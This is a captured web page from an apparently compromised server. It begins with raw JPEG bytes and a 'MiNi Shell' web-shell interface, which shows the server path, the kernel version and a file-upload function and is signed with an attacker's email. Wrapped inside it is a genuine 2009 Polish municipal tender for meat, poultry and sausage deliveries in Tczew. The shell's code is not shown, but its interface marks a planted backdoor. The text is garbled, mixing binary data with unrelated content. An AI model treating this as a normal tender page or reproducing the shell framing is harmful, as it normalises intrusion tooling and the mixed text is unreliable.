JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090907/149519-N-2009.html

<p class="kh_header"><b>Tczew: dostawa mięsa i produktów mięsnych</b><br>
<b>Numer ogłoszenia: 149519 - 2009; data zamieszczenia: 07.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Armii Krajowej 39, 83-110 Tczew, woj. pomorskie, tel. 058 7770020, faks 058 5326003.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wrotapomorza.pl/pl/bip/gminy/tczew-miasto/mops_tczew</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa mięsa i produktów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie  Nr 1 : Produkty zwierzęce, mięso i produkty mięsne - CPV  15100000-9

Nazwa przedmiotu zamówienia	jednostka miary	przewidywana ilość produktu
gulaszowe wołowe	kg.	150
Szynka wieprzowa bez kości i bez skóry	kg.	60
Wołowina gulaszowa z szynki	kg.	25
Łopatka bez kości i bez skóry	kg.	600
Schab bez kości	kg.	150
Boczek świeży bez skóry i bez kości	kg	40
Wątroba wieprzowa	kg	300
Karkówka bez kości	kg.	300
Boczek wędzony wieprzowy bez kości	kg. 	160
żeberka płaty	kg	150
szynka gotowana	kg.	60
ogonówka	kg.	3
Serca wieprzowe	kg.	300
Nerki wieprzowe	kg.	10
Golonka wieprzowa przednia	kg.	100
Golonka wieprzowa tylna	kg.	50
Biodrówka wieprzowa	kg.	10
Kości świeże	kg.	70
Kości wędzone	kg.	50
Nogi wieprzowe	kg.	25
Mielone z łopatki	kg.	125


Zadanie  Nr 2 : Drób i podroby- CPV 15112000-6 (15114000-0)

Nazwa przedmiotu zamówienia	jednostka miary	przewidywana ilość produktu
Skrzydła z kurcząt	kg.	220
Udka z kurcząt	kg.	900
Filet z kurczaka	kg.	300
Polędwica drobiowa 	kg	50
Mielonka drobiowa	kg.	10
Szynka z indyka	kg.	10
Krakowska parzona drobiowa	kg.	5
Żołądki z kurczaka 	kg.	300
Serca z kurczaka	kg.	5
Korpus z kurczaka świeży	kg.	10
kurczak - cały	kg.	5
salami drobiowe	kg.	3
filet z indyka	kg.	175
Szyje z indyka	kg.	50
Wątróbki drobiowe z kurczaka	kg.	200
Wątróbki drobiowe z indyka	kg.	50
Mielone z indyka	kg.	10
Gulaszowe z indyka	kg.	25

Zadanie Nr 3: Pozostałe produkty mięsne- CPV 15130000-8

Nazwa przedmiotu zamówienia	jednostka miary	przewidywana ilość produktu
Jałowcowa	kg.	2,5
Kiełbasa grilowa	kg.	2,5
kiełbasa szynkowa	kg.	15
Kiełbasa śląska	kg.	300
Kiełbasa toruńska	kg.	30
Serdelki	kg	300
Parówki	kg.	600
mielonka	kg.	20
Pasztetowa luksusowa	kg.	35
Kaszanka	kg.	100
Salceson biały	kg.	30
Salceson czarny	kg.	20
Metka wiejska	kg.	15
kiełbasa krakowska parzona wieprzowa	kg	30
kiełbasa zwyczajna	kg	80
kiełbasa mortadela	kg.	130
salami wieprzowe	kg.	2,5
konserwa turystyczna 300 g.	szt.	350
kiełbasa biała	kg.	100
Flaki wołowe odgotowane krojone	kg	250.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.40.00-0, 15.11.20.00-6, 15.13.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
1.	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
5.	Zamawiający dokona oceny spełniania warunków na podstawie złożonego oświadczenia i dokumentów opisanych w pkt. 7 specyfikacji istotnych warunków zamówienia, wg. formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wraz z ofertą wypełnioną na Formularzu oferty należy załączyć:
1.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu wg. załączonego wzoru - zał. Nr 2 do SIWZ,
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, z datą
3.	wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę składa pełnomocnik, tj. dokument stwierdzający ustanowienie pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu
5.	udzielenie zamówienia i zawarcia umowy powinno być dołączone do oferty, o ile sposób reprezentacji nie wynika z innych dokumentów, np. z odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej, załączonych do oferty oraz powinno odpowiadać w zakresie formy przepisom Kodeksu Cywilnego (oryginał lub uwierzytelniony odpis).
6.	Zasady składania oferty przez podmioty występujące wspólnie:
a)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
b)	Wymagane oświadczenia i dokumenty wskazane w pkt.1 i 2, powinny być złożone przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
c)	W przypadku załączenia do oferty innych dokumentów niż wymagane przez Zamawiającego (np. materiały reklamowe) dokumenty takie nie będą oceniane przez Zamawiającego i nie będą miały wpływu na wybór najkorzystniejszej oferty.
d)	Zakres i forma ww. dokumentów musi być zgodna z Rozporządzeniem Prezesa Rady Ministrów z dn. 19.05.2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.wrotapomorza.pl/pl/bip/gminy/tczew-miasto/mops_tczew.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
83 - 110 Tczew
ul. Armii Krajowej 39
fax: (0-58) 532 - 60 -03.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 10:00, miejsce: Sekretariat Miejskiego Ośrodka Pomocy Społecznej w Tczewie przy ul. Armii Krajowej 39.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  Nr 1 : Produkty zwierzęce, mięso i produkty mięsne - CPV  15100000-9

Nazwa przedmiotu zamówienia	jednostka miary	przewidywana ilość produktu
gulaszowe wołowe	kg.	150
Szynka wieprzowa bez kości i bez skóry	kg.	60
Wołowina gulaszowa z szynki	kg.	25
Łopatka bez kości i bez skóry	kg.	600
Schab bez kości	kg.	150
Boczek świeży bez skóry i bez kości	kg	40
Wątroba wieprzowa	kg	300
Karkówka bez kości	kg.	300
Boczek wędzony wieprzowy bez kości	kg. 	160
żeberka płaty	kg	150
szynka gotowana	kg.	60
ogonówka	kg.	3
Serca wieprzowe	kg.	300
Nerki wieprzowe	kg.	10
Golonka wieprzowa przednia	kg.	100
Golonka wieprzowa tylna	kg.	50
Biodrówka wieprzowa	kg.	10
Kości świeże	kg.	70
Kości wędzone	kg.	50
Nogi wieprzowe	kg.	25
Mielone z łopatki	kg.	125.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> drób i podroby.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  Nr 2 : Drób i podroby- CPV 15112000-6 (15114000-0)

Nazwa przedmiotu zamówienia	jednostka miary	przewidywana ilość produktu
Skrzydła z kurcząt	kg.	220
Udka z kurcząt	kg.	900
Filet z kurczaka	kg.	300
Polędwica drobiowa 	kg	50
Mielonka drobiowa	kg.	10
Szynka z indyka	kg.	10
Krakowska parzona drobiowa	kg.	5
Żołądki z kurczaka 	kg.	300
Serca z kurczaka	kg.	5
Korpus z kurczaka świeży	kg.	10
kurczak - cały	kg.	5
salami drobiowe	kg.	3
filet z indyka	kg.	175
Szyje z indyka	kg.	50
Wątróbki drobiowe z kurczaka	kg.	200
Wątróbki drobiowe z indyka	kg.	50
Mielone z indyka	kg.	10
Gulaszowe z indyka	kg.	25.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.40.00-6, 15.11.40.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pozostałe prodykty mięsne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3: Pozostałe produkty mięsne- CPV 15130000-8

Nazwa przedmiotu zamówienia	jednostka miary	przewidywana ilość produktu
Jałowcowa	kg.	2,5
Kiełbasa grilowa	kg.	2,5
kiełbasa szynkowa	kg.	15
Kiełbasa śląska	kg.	300
Kiełbasa toruńska	kg.	30
Serdelki	kg	300
Parówki	kg.	600
mielonka	kg.	20
Pasztetowa luksusowa	kg.	35
Kaszanka	kg.	100
Salceson biały	kg.	30
Salceson czarny	kg.	20
Metka wiejska	kg.	15
kiełbasa krakowska parzona wieprzowa	kg	30
kiełbasa zwyczajna	kg	80
kiełbasa mortadela	kg.	130
salami wieprzowe	kg.	2,5
konserwa turystyczna 300 g.	szt.	350
kiełbasa biała	kg.	100
Flaki wołowe odgotowane krojone	kg	250.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com